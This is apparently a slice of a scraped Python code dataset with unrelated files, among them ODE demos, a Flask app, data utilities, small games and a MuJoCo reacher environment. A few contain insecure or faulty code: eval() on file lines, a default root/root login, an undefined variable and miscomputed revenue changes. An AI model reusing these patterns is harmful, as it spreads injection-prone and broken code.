'usa.csv', index=False)\ndf_latest.to_csv(ROOT / 'output' / 'usa_latest.csv', index=False)\n\n# Save dataset in JSON format into output folder\ndf.to_json(ROOT / 'output' / 'usa.json', orient='records')\ndf_latest.to_json(ROOT / 'output' / 'usa_latest.json', orient='records')","sub_path":"input/parse_covidtracking_api.py","file_name":"parse_covidtracking_api.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365411218","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Stiffness in Initial Value Problems\n\n# In[1]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as pt\n\n\n# Consider $y'=-100y+100t + 101$.\n# \n# Exact solution: $y(t)=1+t+ce^{-100t}$.\n# \n# Exact solution derivative: $y'(t)=1-100ce^{-100t}$.\n\n# In[2]:\n\n\ndef f(t, y):\n return -100*y+100*t + 101\n\n\n# In[3]:\n\n\nt_end = 0.2\n\ndef plot_solution(t0, y0):\n c = (y0-1-t0)/np.exp(-100*t0)\n t_mesh = np.linspace(t0, t_end, 1000)\n solution = 1+t_mesh+c*np.exp(-100*t_mesh)\n \n pt.plot(t_mesh, solution, label=\"exact\")\n pt.plot(t0, y0, \"ko\")\n\n\n# In[4]:\n\n\nplot_solution(t0=0, y0=1)\nplot_solution(t0=0, y0=1.2)\nplot_solution(t0=0, y0=-0.5)\nplot_solution(t0=0.05, y0=-0.5)\n\n\n# Here's a helper function that uses a time stepper in the form of a `step_function` to numerically solve an ODE and plot the numerical solution:\n\n# In[38]:\n\n\ndef integrate_ode(step_function, t0, y0, h):\n times = [t0]\n ys = [y0]\n\n while times[-1] <= t_end + 1e-14:\n t = times[-1]\n ys.append(step_function(t, ys[-1], h))\n times.append(t + h)\n\n pt.plot(times, ys, label=step_function.__name__)\n pt.xlim([t0, t_end])\n pt.ylim([-1, 2])\n pt.legend(loc=\"best\")\n\n\n# ## Using an Explicit Method\n\n# First, implement `forward_euler_step(tk, yk, h)`:\n\n# In[44]:\n\n\ndef forward_euler_step(tk, yk, h):\n return yk + h*f(tk, yk)\n\n\n# In[45]:\n\n\nt0 = 0.05\ny0 = -0.5\nh = 0.008 # start this at 0.001, then grow\n\nplot_solution(t0=t0, y0=y0)\nintegrate_ode(forward_euler_step, t0=t0, y0=y0, h=h)\n\n\n# * What's the main challenge here?\n\n# ## Using an Implicit Method\n\n# Next, implement `backward_euler_step(tk, yk, h)`:\n\n# In[46]:\n\n\ndef backward_euler_step(tk, yk, h):\n tkp1 = tk+h\n return (yk + h*(100*tkp1 + 101))/(1+100*h)\n\n\n# In[48]:\n\n\nt0 = 0.05\ny0 = -0.5\nh = 0.05 # start this at 0.001, then grow\n\nplot_solution(t0=t0, y0=y0)\nintegrate_ode(backward_euler_step, t0=t0, y0=y0, h=h)\npt.xlim([t0, t_end])\npt.ylim([-1, 2])\npt.legend()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"demos/upload/ivp_odes/Stiffness.py","file_name":"Stiffness.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71007275","text":"# Import flask and template operators\nfrom flask import Flask, render_template, g\n\n# Import SQLAlchemy\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flask_login import login_user, logout_user, current_user, \\\n login_required, LoginManager\n\n# Define the WSGI application object\napp = Flask(__name__)\n\n# Configurations\napp.config.from_object('config')\n\n# Define the database object which is imported\n# by modules and controllers\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'routes.get_login'\n\n@app.before_first_request\ndef setup():\n # Recreate database each time for demo\n from .models import User\n user = db.session.query(User).filter_by(username='root').first()\n if user is not None:\n return\n me = User('root', 'root', 'default.jpg')\n db.session.add(me)\n db.session.add(notme)\n db.session.commit()\n\n\n# Sample HTTP error handling\n@app.errorhandler(404)\ndef not_found(error):\n return render_template('404.html'), 404\n\n@login_manager.user_loader\ndef load_user(id):\n from .models import User\n return User.query.get(int(id))\n\n@app.before_request\ndef before_request():\n g.user = current_user\n\n# Import a module / component using its blueprint handler variable (mod_auth)\nfrom app.blueprints.api import api\nfrom app.blueprints.routes import routes\n\n# Register blueprint(s)\napp.register_blueprint(api)\napp.register_blueprint(routes)\n# app.register_blueprint(xyz_module)\n# ..\n\n# Build the database:\n# This will create the database file using SQLAlchemy\ndb.create_all()","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99091245","text":"import os\nimport pandas as pd\nimport gzip\nfrom pathlib import Path\nimport re\nimport json as js\n\n\ndef parse_data(fname):\n for l in open(fname):\n yield eval(l)\n\n\ndef parse_gzip(path):\n g = gzip.open(path, 'rb')\n for l in g:\n yield eval(l)\n\n\ndef getDF_gzip(path):\n i = 0\n df = {}\n for d in parse_gzip(path):\n df[i] = d\n i += 1\n return pd.DataFrame.from_dict(df, orient='index')\n\n\ndef getDF_csv(path, encoding, names):\n return pd.read_csv(path, encoding=encoding, names=names)\n\n\ndef getDF_json(path):\n return pd.read_json(path)\n\n\ndef compose():\n csv_names = ['asin', 'imageName', 'imageUrl', 'title', 'author', 'categoryId', 'category']\n csv_df1 = getDF_csv('data/book30-listing-test.csv', encoding='utf_16_be', names=csv_names)\n csv_df2 = getDF_csv('data/book30-listing-train.csv', encoding='utf_16_be', names=csv_names)\n csv_df3 = getDF_csv('data/book32-listing.csv', encoding='iso-8859-1', names=csv_names)\n\n csv_data = pd.concat([csv_df1, csv_df2, csv_df3])\n csv_data.drop_duplicates('asin')\n # csv_data['categories'] = csv_data.apply(lambda row: [row['category']], axis=1)\n csv_data = csv_data.drop(columns=['imageName', 'title', 'author', 'categoryId'])\n print(csv_data.shape)\n csv_data = csv_data.dropna()\n print(csv_data.shape)\n\n # create file\n os.makedirs('data/processed', exist_ok=True)\n Path('data/processed/books_200000.json').touch()\n csv_data.to_json('data/processed/books_200000.json', orient='records')\n\n\ndef collect_classes():\n df = pd.read_json('data/processed/books_200000.json')\n categories = df.category.unique()\n categories.sort()\n d = pd.DataFrame(categories, columns=['class'])\n d = d.dropna()\n print(d)\n d.to_csv('data/processed/classes.csv', index_label='index')\n\n\ndef collect_labels():\n books = pd.read_json('data/processed/books_200000.json')\n classes = pd.read_csv('data/processed/classes.csv')\n d = pd.DataFrame(columns=['asin', 'class'])\n for row in books.itertuples():\n category = row.category\n entry = classes[classes['class'] == category]\n d = d.append({'asin': row.asin, 'class': entry['index']}, ignore_index=True)\n break\n return d\n\n\ndef category_to_folder(category):\n name = category.lower()\n name = re.sub('[^\\w^\\s]', '', name)\n name = name.replace(' ', '_')\n name = name.replace('__', '_')\n return name\n\n\ndef create_folder_to_cat_dict(filename=None):\n df = pd.read_json('data/processed/books_200000.json')\n categories = df.category.unique()\n categories.sort()\n dict = {}\n for c in categories:\n folder = category_to_folder(c)\n dict[folder] = c\n if (filename):\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w+') as json_file:\n js.dump(dict, json_file, indent=4, sort_keys=True)\n return dict","sub_path":"utils/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"349113939","text":"import cv2\n\n# import cv\nfrom PyQt5 import QtCore\n\n\ndef getCapture():\n # capture = cv.CaptureFromCAM(0)\n capture = cv2.VideoCapture(-1)\n # cv.NamedWindow(\"capture\", cv.CV_WINDOW_AUTOSIZE)\n cv2.namedWindow(\"capture\", cv2.WINDOW_AUTOSIZE)\n\n i = 0\n while True:\n # frame = cv.QueryFrame(capture)\n result, img = capture.read()\n # cv.ShowImage(\"capture\", frame)\n cv2.imshow(\"capture\", img)\n # cv.WaitKey(10)\n cv2.waitKey(10)\n path = \"capture%.4d.jpg\" % i # Уникальное имя для каждого кадра\n # cv.SaveImage(path, frame)\n cv2.imwrite(path, img)\n i += 1\n\n\ndef getCaprure_2():\n cap = cv2.VideoCapture(0)\n\n while True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Video', frame)\n # cv2.imshow('frame',gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\n\nclass Video_capture(QtCore.QObject):\n signal = QtCore.pyqtSignal(object)\n\n def __init__(self):\n super().__init__()\n self.capture = cv2.VideoCapture(0)\n\n def run(self):\n while True:\n ret, frame = self.capture.read()\n self.signal.emit(frame)\n\n\n\nif __name__ == '__main__':\n # getCapture()\n getCaprure_2()\n","sub_path":"Webcam_captures/Video_capture.py","file_name":"Video_capture.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"404434584","text":"import turtle as t\nimport math as m\n\n\ndef can_T(a, b, ac, bc, xo, ai, bi, llen1, llen2, lo, orwrite):\n p = (a, b)\n l1 = llen1;\n l2 = llen2\n t.speed(30);\n t.pensize(0)\n t.up()\n t.seth(xo)\n t.goto(a, b)\n t.down()\n if ai == 1:\n t.pencolor(ac)\n t.fd(l1)\n t.fd(-l1 * 2)\n t.fd(l1)\n if bi == 1:\n t.lt(lo)\n if bi == 1:\n t.pencolor(bc)\n t.fd(l2)\n t.fd(-l2 * 2)\n t.fd(l2)\n t.rt(lo)\n if orwrite > 0:\n t.pencolor(ac)\n t.write(p)\n t.up()\n return p\n\n\ndef fant(fant, fx, fy, a, b, k):\n t.pensize(1)\n fa = fant\n l = b - a;\n a11 = a;\n a12 = b\n l2 = (a + b) / 2\n t.up()\n n = int(k) + 1\n k = l / n\n fa = fant\n x = l2\n y1 = eval(fa)\n y2 = y1\n t.pencolor('red')\n xi = [a]\n for i in range(1, n + 1):\n xi += [a + i * k]\n for i in range(n + 1):\n x = xi[i]\n y = eval(fa)\n y0 = fy * (y - y1)\n e = (x - l2) * fx\n x0 = e\n t.goto(x0, y0)\n t.down()\n if i == 0:\n a21 = x0;\n b21 = y0\n b11 = y\n if i == n:\n b12 = y\n t.up()\n return [a21, b21, x0, y0, 0, 0, a11, b11, a12, b12, l2, y2] # 12个\n\n\ndef kedu(a, b, lr, lc, f, k, ox, pc, ls, orfc):\n ls = ls + 1;\n lr = lr * f\n t.up();\n t.speed(30)\n p = (a, b)\n t.goto(p)\n n = 10 * int(k + 1)\n lri = lr / n\n li = [-lr]\n for i in range(1, 2 * n + 1):\n li += [-lr + i * lri]\n t.seth(ox)\n t.fd(-lr)\n for i in range(2 * n + 1):\n if i == 0:\n t.down()\n t.pencolor(pc)\n t.lt(90)\n fc = 1\n if i % 5 == 0:\n t.pensize(ls + 1)\n fc = fc * 1.25\n if i % 10 == 0:\n t.pensize(ls + 2)\n fc = fc * 1.5\n if orfc == 0:\n f = 1\n ai = round((i * lri - lr) / f, 2)\n t.dot(2.5, pc)\n t.fd(-3 * lc * fc)\n t.write(' ' + str(ai))\n t.fd(3 * lc * fc)\n t.fd(lc * fc)\n t.fd(-lc * 2 * fc)\n t.fd(lc * fc)\n t.pensize(ls)\n t.rt(90)\n if i < 2 * n:\n t.fd(lri)\n if i == n - 1:\n t.dot(5, pc)\n t.write(' 0')\n if i == 0:\n t.down()\n t.up()\n t.goto(p)\n return li\n\n\ndef main(y):\n t.setup(1000, 800, 300, 0)\n can_T(0, 0, 'white', 'white', 0, 1, 1, 1000, 1000, 90, 0)\n k = 100 # 视图放大倍数\n t.bgcolor('grey')\n val = fant(y[3], k, k, 0.01, 3, 250)\n can_T(-val[10] * k, -val[11] * k, 'blue', 'blue', 0, 1, 1, 1000, 1000, 90, 0)\n li = kedu(-val[10] * k, -val[11] * k, 4, 3, k, 1, 0, 'blue', 0, 1)\n kedu(-val[10] * k, -val[11] * k, 4, 3, k, 1, 90, 'blue', 0, 1)\n t.goto(200, 200)\n t.write('y=' + y[2] + ' [' + str(val[6]) + ',' + str(val[8]) + ']', font=('微软雅黑', 20, 'normal'))\n print(li)\n t.done()\n\n\nif __name__ == '__main__':\n y = ['lg|x|-cos x', 'm.log10(abs(x))-m.cos(x)', 'sin(x)', 'm.sin(x)']\n main(y)\n","sub_path":"main/02/帮人做题4.6.17.53.py","file_name":"帮人做题4.6.17.53.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384034220","text":"import sys\n\n# 모든 문제는 패턴이 있는 경우가 많으며, 그 패턴을 찾는것이 가장 중요한 일이다!\ndef make(n, t):\n for i in range (4, n + 1):\n mem = t[i - 1] + 1\n if not i % 2:\n if mem > t[i // 2] + 1:\n mem = t[i // 2] + 1\n if not i % 3:\n if mem > t[i // 3] + 1:\n mem = t[i // 3] + 1\n t.append(mem)\n return t[i]\n\nt = [0, 0, 1, 1]\nnum = int(sys.stdin.readline())\nif num <= 3:\n print (t[num])\nelse:\n print (make(num, t))","sub_path":"(1463) 1로 만들기.py","file_name":"(1463) 1로 만들기.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"333153403","text":"import pygame.font\nfrom pygame.sprite import Group\n\nclass HighScores:\n def __init__(self, screen):\n self.screen = screen\n self.screen_rect = screen.get_rect()\n self.high_scores_list = open(\"high_scores.txt\", \"r\")\n self.pointsfont = pygame.font.SysFont(\"Comic Sans MS\", 64)\n self.scorefont = pygame.font.SysFont(\"Comic Sans MS\", 48)\n self.titlesurface = self.pointsfont.render('HIGH SCORES', False, (255, 255, 25))\n\n\n self.scores_list = []\n\n #Read the high scores from the text file\n while True:\n self.current_score = self.high_scores_list.readline()\n self.scores_list.append(self.current_score)\n if self.current_score == \"\":\n break\n # Convert the scores to ints to sort them\n index = 0\n for score in self.scores_list:\n strippedscore = score.rstrip(\"\\r\\n\")\n score = (\"0\" + score)\n score = int(score)\n self.scores_list[index] = score\n index += 1\n\n self.scores_list.sort()\n self.scores_list.reverse()\n\n # Show the scores\n def show_score(self):\n self.screen.blit(self.titlesurface, (self.screen_rect.centerx - 200, 120))\n loopindex = 0\n # display the high scores in a list\n for score in self.scores_list:\n if score == 0:\n break\n score_y = 220 + (loopindex * 40)\n scoresurface = self.scorefont.render(str(loopindex + 1) + \". \" + str(score), False, (255, 255, 255))\n\n self.screen.blit(scoresurface, (self.screen_rect.centerx - 100, score_y))\n loopindex += 1\n # only show the top 10 scores\n if loopindex >= 10:\n break\n\n\n\n\n\n\n","sub_path":"venv/high_scores.py","file_name":"high_scores.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"92850246","text":"import os\nimport csv\n\ncsvpath1 = os.path.join('Resources', 'budget_data_1.csv')\ncsvpath2 = os.path.join('Resources', 'budget_data_2.csv')\n\n#Variables for CSV1\nmonth_count1 = 0\ntotal_revenue1 = 0\nCMRI_01=0\nLMRI_01=0\nRC_01 = 0\nRCS_01 = 0\nRevChanges01=[]\nMonth_Changes01 = []\n\n#Variables for CSV2\nmonth_count2 = 0\ntotal_revenue2 = 0\nCMRI_02=0\nLMRI_02=0\nRC_02 = 0\nRCS_02 = 0\nRevChanges02=[]\nMonth_Changes02 = []\n\n#CSV 1 - BUDGET_DATA 1 COMMANDS\nwith open (csvpath1, newline=\"\") as csvfile:\n csvreader1 = csv.reader(csvfile, delimiter=\",\")\n next(csvreader1)\n\n for row in csvreader1:\n month_count1 += 1\n Month_Changes01.append(row[0])\n total_revenue1 += int(row[1])\n CMRI_01 = int(row[1])\n if month_count1 > 1:\n RC_01 = CMRI_01 - LMRI_01\n RevChanges01.append(CMRI_01)\n LMRI_01 = CMRI_01\n\n#Finding Revenue Changes Budget_DATA_01\nSRevChanges01 = sum(RevChanges01)\naverage_change01 = SRevChanges01 / (month_count1 -1)\nmax_change01 = max(RevChanges01)\nmin_change01 = min(RevChanges01)\nmax_month_index01 = RevChanges01.index(max_change01)\nmin_month_index01 = RevChanges01.index(min_change01)\nmax_month01 = Month_Changes01[max_month_index01]\nmin_month01 = Month_Changes01[min_month_index01]\n\n#CSV 2 - BUDGET_DATA 2 COMMANDS\nwith open (csvpath2, newline=\"\") as csvfile:\n csvreader2 = csv.reader(csvfile, delimiter=\",\")\n next(csvreader2)\n \n\n for row in csvreader2:\n month_count2 += 1\n Month_Changes02.append(row[0])\n total_revenue2 += int(row[1])\n CMRI_02 = int(row[1])\n if month_count1 > 1:\n RC_02 = CMRI_02 - LMRI_02\n RevChanges02.append(CMRI_02)\n LMRI_02 = CMRI_02\n\n#Finding Revenue Changes Budget_DATA_02\nSRevChanges02 = sum(RevChanges02)\naverage_change02 = SRevChanges02 / (month_count2 -1)\nmax_change02 = max(RevChanges02)\nmin_change02 = min(RevChanges02)\nmax_month_index02 = RevChanges02.index(max_change02)\nmin_month_index02 = RevChanges02.index(min_change02)\nmax_month02 = Month_Changes02[max_month_index02]\nmin_month02 = Month_Changes02[min_month_index02]\n\n\n#CALCULATING TOTALS\ntotalmonths = int(month_count1) + int(month_count2)\ntotalrevenue = int(total_revenue1) + int(total_revenue2)\ntotalaverage = (int(average_change02) + int(average_change01)) / 2\n\n#For First CSV File\n#print(\"Total Financial Analysis: BUDGET_DATA_1:\")\n#print(\"----------------------------\")\n#print(\"Total Months for Budget_Data_1: \" + str(month_count1))\n#print(\"Total Revenue for Budget_Data_1: \" + str(total_revenue1))\n#print(\"Average Changes for Budget_Data_1: \" + str(average_change01))\n#print(\"Greatest Increase in Revenue: Date: \"+ str(max_month01) +\" Increase: $\"+ str(max_change01))\n#print(\"Greatest Decrease in Revenue: Date: \"+ str(min_month01) +\" Decrease: $\"+ str(min_change01))\n\n#print(\"----------------------------\")\n#print(\" \")\n#print(\" \")\n\n#For Second CSV File\n#print(\"Total Financial Analysis: BUDGET_DATA_2:\")\n#print(\"----------------------------\")\n#print(\"Total Months for Budget_Data_2: \" + str(month_count2))\n#print(\"Total Revenue for Budget_Data_2: \" + str(total_revenue2))\n#print(\"Average Changes for Budget_Data_2: \" + str(average_change02))\n#print(\"Greatest Increase in Revenue: Date: \"+ str(max_month02) +\" Increase: $\"+ str(max_change02))\n#print(\"Greatest Decrease in Revenue: Date: \"+ str(min_month02) +\" Decrease: $\"+ str(min_change02))\n\n\n\n#print(\"----------------------------\")\n#print(\" \")\n#print(\" \")\n\n#Combined Totals\nprint(\"Total Financial Analysis: TOTAL\")\nprint(\"----------------------------\")\nprint(\"Total Months: \" + str(totalmonths))\nprint(\"Total Revenue: \" + str(totalrevenue))\nprint(\"Total average change: \" + str(totalaverage))\nprint(\"Total Greatest Increase in Revenue: Date: \"+ str(max_month01) +\" Increase: $\"+ str(max_change01))\nprint(\"Total Greatest Decrease in Revenue: Date: \"+ str(min_month01) +\" Decrease: $\"+ str(min_change01))","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624430821","text":"#!/usr/bin/env python3.4\n# Test script\n# Created by Gerard Heijmans juli 2015.\n#\nimport sys, subprocess, os\n\nprint(\"The current working directory is: {}\".format(os.getcwd()))\n\nfor file in os.listdir(os.getcwd()):\n if os.path.isfile(file):\n print(file)\n","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"268294399","text":"from solutions import Trie, any_ranges\nimport unittest\nfrom n_gram import nlog_gen, unigram_smooth_gen\n\nclass DummyModel:\n dummy_data = (\n (('ab',), 0.25),\n (('abc',), 0.25),\n (('acb',), 0.25),\n (('a',), 0.25),\n )\n\n def set_a(self, tf: bool):\n self._a = tf\n\n @property\n def iterprob(self):\n if self._a:\n return iter(DummyModel.dummy_data)\n else:\n return iter(DummyModel.dummy_data[:-1])\n\n\nclass TestTrie(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n super(TestTrie, self).__init__(*args, **kwargs)\n\n model = DummyModel()\n model.set_a(False)\n us = unigram_smooth_gen(0.95, 1/1000000)\n _nlog = nlog_gen()\n self._trie = Trie(model, us, _nlog)\n\n eow = Trie.eow()\n value = _nlog(us(0.25))\n data = { 'a': { # eow: value,\n 'b': { eow: value,\n 'c': { eow: value }, },\n 'c': {\n 'b': { eow: value } }\n }\n }\n self._data = data\n self.assertEqual(self._trie.data, self._data)\n\n def test_search(self):\n trie = self._trie\n ret = trie.search_through('abce')\n self.assertEqual(list(ret), ['ab', 'abc'])\n\n def test_range(self):\n for i,j in any_ranges(range(10)):\n self.assertGreater(j, i)\n for i,j in any_ranges([2,5,7]):\n self.assertGreater(j, i)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"zchen/utils/test_solutions.py","file_name":"test_solutions.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205498371","text":"class Node:\n def __init__(self,val=0,left=None,right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def rob(self,root):\n if not root:\n return 0\n\n def helper(node):\n # A null node will send that if you choose me or my grandchildren, \\\n # the max gain you can get is only 0,0\n if not node:\n return [0,0]\n # Recursively find what the gain would be by choosing left child and left grandchild\n left_child,left_grandchild = helper(node.left)\n right_child,right_grandchild = helper(node.right)\n # If I choose the current node, then I can only choose the grandchildren\n with_node = node.val + left_grandchild + right_grandchild\n # If I don't choose the node, then I am free to choose the maximum gain amongst leftchild and grandchild \\\n # rightchild and grandchild cause they will never be directly connected\n without_node = max(left_child,left_grandchild) + max(right_child,right_grandchild)\n\n return [with_node,without_node]\n \n return max(helper(root))\n\nroot = Node(3)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.right = Node(3)\nroot.right.right = Node(1)\n\nobj = Solution()\nprint(obj.rob(root))","sub_path":"337-House-Robber-3.py","file_name":"337-House-Robber-3.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131617170","text":"from gym import utils\nfrom multiworld.envs.goal_env_ext.goal_env_ext import GoalEnvExt\nfrom multiworld.envs.env_util import get_stat_in_paths, \\\n create_stats_ordered_dict, get_asset_full_path\n\nimport os\nfrom collections import OrderedDict\nimport numpy as np\nimport mujoco_py\n\n\nclass ReacherEnv(GoalEnvExt, utils.EzPickle):\n def __init__(self, model_path='./reacher/reacher.xml', distance_threshold=1e-2, distance_threshold_obs=0,\n n_substeps=10,\n horizon=50, image_size=48, action_type='velocity',\n with_goal=False,\n use_visual_observation=True,\n use_image_goal=True,\n use_true_reward=False, **kwargs):\n\n GoalEnvExt.__init__(self, model_path=model_path, n_substeps=n_substeps, horizon=horizon, image_size=image_size,\n use_image_goal=use_image_goal, use_visual_observation=use_visual_observation,\n with_goal=with_goal, reward_type='sparse', distance_threshold=distance_threshold,\n distance_threshold_obs=distance_threshold_obs, use_true_reward=use_true_reward, n_actions=2,\n **kwargs)\n utils.EzPickle.__init__(self)\n\n self.action_type = action_type\n\n # Implementation of functions from GoalEnvExt\n # ----------------------------\n\n def _reset_sim(self):\n # Sample goal and render goal state image\n qpos = self.np_random.uniform(low=-2 * np.pi, high=2 * np.pi, size=self.model.nq)\n self.set_state(qpos, qvel=self.init_qvel)\n self.goal_state = self.get_end_effector_location()\n\n qpos[-2:] = self.goal_state\n qpos[:2] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n self.goal_observation = self.render(mode='rgb_array', depth=False)\n qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n\n return True\n\n def _get_obs(self):\n if self.use_visual_observation:\n obs = self.render(mode='rgb_array', depth=False).transpose()\n else:\n theta = self.sim.data.qpos.flat[:2]\n obs = np.concatenate([\n np.cos(theta),\n np.sin(theta),\n self.sim.data.qpos.flat[2:],\n self.sim.data.qvel.flat[:2],\n self.get_end_effector_location() - self.get_goal_location()\n ])\n if self.use_image_goal:\n desired_goal = self.goal_observation.transpose() if (self.goal_observation.shape[0] != 3 and self.goal_observation.shape[0] != 4) else self.goal_observation\n achieved_goal = obs\n else:\n desired_goal = self.get_goal_location()\n achieved_goal = self.get_end_effector_location()\n\n return {\n 'observation': obs.copy(),\n 'achieved_goal': achieved_goal.copy(),\n 'desired_goal': desired_goal.copy()\n }\n\n def get_current_info(self):\n \"\"\"\n :return: The true current state, 'ag_state', and goal state, 'g_state'\n \"\"\"\n ag_state = self.get_end_effector_location().copy()\n g_state = self.get_goal_location().copy()\n info = {\n 'ag_state': ag_state,\n 'g_state': g_state,\n 'effector2goal_distance': np.linalg.norm(ag_state - g_state)\n }\n return info\n\n def _set_action(self, ctrl):\n if self.action_type == 'force':\n self.send_control_command(ctrl)\n elif self.action_type == 'velocity':\n self.send_control_command(np.asarray([0., 0.])) # Set the force to be zero\n self.set_joint_velocity(np.asarray(ctrl) * 10)\n\n def _viewer_setup(self):\n self.viewer.cam.lookat[0] = 0.0 # x,y,z offset from the object (works if trackbodyid=-1)\n self.viewer.cam.lookat[1] = 0.0\n self.viewer.cam.lookat[2] = 0.0\n self.viewer.cam.elevation = -90 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)\n self.viewer.cam.azimuth = 90\n self.viewer.cam.distance = 1.3\n\n def set_hidden_goal(self):\n self.sim.model.geom_rgba[9, :] = np.asarray([0., 0., 0, 0.]) # Make the goal transparent\n\n # Env specific helper functions\n # ----------------------------\n def set_goal_location(self, goalPos):\n self.sim.data.qpos[2] = goalPos[0]\n self.sim.data.qpos[3] = goalPos[1]\n\n def send_control_command(self, ctrl):\n assert len(ctrl) == 2\n self.sim.data.ctrl[0] = ctrl[0]\n self.sim.data.ctrl[1] = ctrl[1]\n\n def set_joint_velocity(self, jointVel):\n self.sim.data.qvel[0:2] = jointVel\n\n def get_end_effector_location(self):\n return np.squeeze(self.sim.data.body_xpos[3:4, 0:2]).copy()\n\n def get_goal_location(self):\n return np.squeeze(self.sim.data.body_xpos[4:5, 0:2]).copy()\n\n def _sample_goal(self):\n while True:\n goal = self.np_random.uniform(low=-.2, high=.2, size=2)\n if np.linalg.norm(goal) < 2:\n break\n return goal\n\n\n# Start Adding interface for multiworld environment collection\n\n def _sample_goal_state(self):\n return self._sample_goal()\n\n def get_goal(self):\n ''' Get goal that are stored currently in this object.\n (refering to the rlkit interface, provide what it need...)\n '''\n return {\n 'desired_goal': self.goal_state,\n 'state_desired_goal': self.goal_state,\n }\n\n def set_to_goal(self, goal):\n ''' @brief: Set the goal which stores in this object and move the object to\n the position by the given goal.\n @args: 'goal': must be a numpy array (not matrix)\n '''\n self.goal_state = goal['state_desired_goal']\n \n # move the end effector to the goal\n qpos = self.np_random.uniform(low=-2 * np.pi, high=2 * np.pi, size=self.model.nq)\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n self.goal_observation = self.render(mode='rgb_array', depth=False)\n qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n\n def set_goal(self, goal):\n ''' And randomize the state\n '''\n self.goal_state = goal['state_desired_goal']\n \n # It should be similar to reset the environment\n qpos = self.np_random.uniform(low=-2 * np.pi, high=2 * np.pi, size=self.model.nq)\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n self.goal_observation = self.render(mode='rgb_array', depth=False)\n qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n\n def get_image(self, width=84, height=84, camera_name=None):\n assert width == height\n image = self.render(mode='rgb_array', image_size=width, depth=False)\n return image\n\n def get_diagnostics(self, paths, prefix=''):\n statistics = OrderedDict()\n # for stat_name in [\n # 'touch_distance',\n # 'hand_success',\n # 'obj_success',\n # 'hand_and_obj_success',\n # 'touch_success',\n # 'hand_distance',\n # 'obj_distance',\n # 'hand_and_obj_distance',\n # 'total_pickups',\n # ]: # these are copied from saywer_pickup_and_place.py\n for stat_name in [\n 'ag_state', 'g_state', 'image_dist', 'image_success',\n ]:\n stat_name = stat_name\n stat = get_stat_in_paths(paths, 'env_infos', stat_name)\n statistics.update(create_stats_ordered_dict(\n '%s%s' % (prefix, stat_name),\n stat,\n always_show_all_stats=True,\n ))\n statistics.update(create_stats_ordered_dict(\n 'Final %s%s' % (prefix, stat_name),\n [s[-1] for s in stat],\n always_show_all_stats=True,\n ))\n return statistics\n\n def _set_env_state(self, state):\n ''' According to multiworld, there is a base class. \n But this is roughly already the base class along the inheritance chain.\n I put the 